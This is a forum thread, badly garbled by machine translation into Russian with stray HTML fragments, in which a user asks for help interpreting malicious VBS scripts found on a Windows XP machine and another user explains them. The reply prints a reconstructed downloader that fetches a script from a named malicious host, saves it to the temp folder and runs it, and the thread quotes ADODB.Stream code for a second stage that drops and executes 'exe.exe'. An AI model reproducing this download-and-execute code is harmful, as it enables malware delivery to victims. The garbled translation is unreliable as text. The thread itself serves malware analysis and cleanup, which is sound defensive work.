Вопрос : Smog специалист пожалуйста попытаться интерпретировать это Кодий VBS

Здравствулте! друг experts

A видел некоторое необыкновенное поведение с ее компьютером Windows XP SP3 IE7 над прошлыми парами дней я глубоки подозрительн.  Я наблюдал оно случаясь над соединением VNC как раз окно короткия периода времени ago.

A CMD.EXE, котор хлопает вверх и очевидно архив waits.
A VBS раскрывает в блокнот Notepad.
When закрыт, окно closes.

I am CMD довольно конечно что это будет злостый сценарий пытая побежать архив VBS без определять программу (CScript или WScript) для того чтобы побежать оно, и потому что я установил действие невыполнения обязательства для большинств типа типов «сценария» архива к «редактирую» действие (блокнот) довольно чем «открытое» одно (исполните сценарий), злостая работа будет вероятно failing.

On первый случай который я witness, архив «yb.vbs» был раскрын в блокнот от скоросшивателя %TEMP% потребителя с следующий содержанием: class= " lineNumbers " >

1 >

B= " yb.vbs " " prettyprint " " class= id= " codeSnippet800241 >
 s http://jyiop.com/kr/yb.vb» и пила что содержание незрело «было obfuscated» путем обращать некоторые из параметров как показан ниже: class= " lineNumbers " >
1 >

w=3000 id= " codeSnippet800242 " >


I безопасн загружало снабженное ссылками «nofollow "» rel=» _blank "» target= " http://jyiop.com/kr/hy/_q.php href=  .php http://jyiop.com/kr/hy/_q» для того чтобы показать это Кодего: class= " lineNumbers " >
1 >

class= " ясное " >

I 
 за исключением цели как > за исключением по мере того как архив *.htm такого же имени) и с правильным Кодим, так, что будет мочь как раз быть реакция сервера к моей попытке загружать file.

Assuming относительный URL приравнивает:  rel= " nofollow " " _blank " " target= " http://jyiop.com/kr/_yoyk.php href=  http://jyiop.com/kr/_yoyk. php
then разрешает к rel= " nofollow " " _blank " " target= " http://www.google.com href=  http://www.google.com 
I am испытывая это на моей собственной системе с rel= " nofollow " " _blank " " target= " http://www.google.co.uk href=  http://www.google.co.uk  как домашняя страница, поэтому я знаем что он как раз не перенаправляет к моему дому page.

On затем случай который я witnessed над VNC, котор командование очевидно было выдано для того чтобы побежать архив «uor.vbs» от скоросшивателя %TEMP% потребителя в окне командование, и тетрадь хлопнула вверх содержащ сценарий: class= " lineNumbers " >
1 >

B= " uor.vbs " " prettyprint " " class= id= " codeSnippet800244 >


Safely «class= 
 bs http://ypuii.com/k_/uor.v» в редакторе текста показало такой же как и прежде, ie. обращенное strings.

Now, я находил что «GetSpecialFolder (2)» ссылает к скоросшивателю %TEMP% потребителя, и я могу увидеть что сценарий загружает архив VBS, создавая VBScript дальше - - летите путем конкатенировать шнуры и обращенные шнуры, но я будьте неуверен точно сценарий как это делающ или пытающся к do.

I am очень conversant с VBS за исключением некоторого основного использования, поэтому следующий справками будут головоломка к мне: 

maertS.BDODA = ADOBD.Stream

c.open OT, a, z: 
If c.send () c.Status = x Then
u=c.ResponseBody: d.Open: d.Type = y: d.Write u: d.SaveToFile b: d.Close

I может увидеть как ясно как день что Шиндошс Медиа Плаыер убивается если оно бежит (оно не был на материальных временах), то но я интересую почему сценарий делал бы другой явно значительно вопрос this.

One что я открыл «недавн напечатанный на машинке URL» в списке падающем вниз адвокатского сословия адреса IE потребителя: rel= " nofollow "» _blank»» target= " http://ypuii.com/k_/zcus/efmjcg.pdf href= 
 fmjcg.pdf
I http://ypuii.com/k_/zcus/e не smogло найти что архив спрятанный в тайнике везде на компьютере и ей потребителя не может даже вспомнить когда она имела бы последнее раскрыла архив PDF в ее браузере.  Я сохранил тот архив PDF и, на осмотре в редакторе текста, я могу увидеть некоторое содержание текста как некоторый вид написанного Кодего и справки к «яваскрипту».  Следующий также ясно в редакторе текста: 
/gZ 

/Author (yZ=ssA f v MllZTgg) (. s_JUNCVZa #8l=z 96yp2x b LPD tv/-Xqrf4dY3M: ihwBQn E K7gATGe h S5Rm k o 0&uFOcj%? 
/Title I1W) (qgMpr#AZMZH Ng JGgG?)
/ModDate 
/Creator 
/Keywords (Mokomeuapaualimajsi) (Kotefekjoesito) (d: 20100621095906) 

Googling 
/Producer (820d5Deawohigejoxamogoga) как раз «создатель» названное «Kotefekjoesito» принимает меня к этой странице: rel= " nofollow "» _blank»» target= " http://jsunpack.jeek.org/dec/go?report=c4cc162b45e937762035f286406a989f2adf2753 href= 
 ec/go http://jsunpack.jeek.org/d? report=c4cc162b45e937762035f286406a989f2adf2753
where оно ясно показывает что архив будет Malicious.

I может только угадать что более предыдущей справкой в VBScript к «ADOBD.Stream» будет справка к «Adobe», и к потоку в злосто произведенном архиве PDF.  Я могу только высказать предположение о том, что это был или стартом вопроса, или то это было архивом fetched злостым сценарием, но я не подумал бы он добавит URL к недавн напечатанному на машинке списку URL.  То озадачивает в itself.

Probably не, котор совпадение что googling StrReverse ()  «maertS.BDODA " также принимает меня к «месту  http://jsunpack.jeek.org  " nofollow "» rel=» _blank» target= " http://jsunpack.jeek.org href=  " с этой страницой: rel= " nofollow "» _blank»» target= " http://jsunpack.jeek.org/dec/go?report=5d7727607489f01840f34855c5664e662488962e href= 
 ec/go http://jsunpack.jeek.org/d? report=5d7727607489f01840f34855c5664e662488962e
but, котор оно не говорит будет malicious.

Could кто-то угодите посоветуйте мне тот первый сценарий правоподобн для того чтобы сделать (или попытать для того чтобы сделать) на компьютере потребителя.  Я хотел был бы знать где я стою, потому что полная развертка антивирус + RootKit системы не производила никакие позитивные результаты а я не могу увидеть все справки к архивам VBS в 

Bill
 registry.

Thanks заранее

class= 

Ответ : Smog специалист пожалуйста попытаться интерпретировать это Кодий VBS

Я не охотно готов пойти далеко как раскрывать вебсайт, котор вы упомянули однако, от сценариев выше здесь я вижу…

Сценарий 1 создает пустой архив, соединения к вебсайт и загрузкам содержание страницы и сбросы оно в пустой архив.  Этот архив сохранен как «yb.vbs» и предполагаем исполнить.
-------------------------------------------------------------------
B= " yb.vbs "
С CreateObject («MSXML2.XMLHTTP»)
      .open «ПОЛУЧАЮТ», «http://jyiop.com/kr/yb.vbs», ложное
      .send ()
      Установите a = CreateObject («Scripting.FileSystemObject»)
      Установите d = A.CreateTextFile (A.GetSpecialFolder (2) + «\» + b)
      D.WriteLine .responseText
Конец с
D.Close
CreateObject («WScript.Shell»). Побегите A.GetSpecialFolder (2) +» \ «+ b
-------------------------------------------------------------------
Раздел 2 теперь, когда был создан архив vbs и бег, он пытается посетить другой webpage но это время сохраняет содержание страницы стержня в вызванный архив «exe.exe».  Этот новый архив должен быть сохраненным в скоросшиватель temp потребителей.
Сценарий после этого бежит архив «exe.exe».
По мере того как вы упомянули, taskkill останавливает Шиндошс Медиа Плаыер - почему, которое знает?!?!
Сценарий после этого уничтожает сценарий vb раздел 1 создал (сценарий в настоящее время бежит).
Будет второе ожидание 3 после этого, котор архив «exe.exe» уничтожен.

Эта часть;
[maertS.BDODA = ADOBD.Stream
c.open OT, a, z: c.send ()
Если c.Status = x после этого
u=c.ResponseBody: d.Open: d.Type = y: d.Write u: d.SaveToFile b: d.Close]
сценарий печатая на машинке для того чтобы раскрыть архив будет течь в webpage - ничего сделать с Adobe.  «c.Status» - сценарий ждет webpage для того чтобы быть готов и приспособлен загружать. «u=c.ResponseBody» принимает страницу стержня и впихывает ее в перемеююый.  Поток раскрын и текст загружан в перемеююый.  Сохранен и закрын архив.  В этом сценарии webpage/архив сохранены в скоросшиватель temp как «exe.exe».

Реальная опасность что архив «exe.exe».  Как только она бежалась, не говорить оно было конструировано для того чтобы сделать.

Тот компьютер все еще заражен с вирусом.  Программа «exe.exe» smogла загружать другие вирусы в предпосылке для того чтобы воспрепятствовать развертки системы.  Факт что вы можете увидеть окно командование открытое и сценарий попытаны для того чтобы побежать говорят мне будет некоторый злостый архив все еще медля.

Может быть временем оценить что потребности быть сохраненным от той машины и начните afresh с заново устанавливать Windows и применений.  Оно звучает драматически но видящ по мере того как антивирус не обнаруживает что-нибыдь из видов я думайте вы с точки зрения никакого возвращения.  Вспомните то покуда злостое Кодий дальше там, любое управляйте; оно ручка памяти USB, камера etc., может потенциальн содержать вирус/троянец, если оно было прикреплен к машине.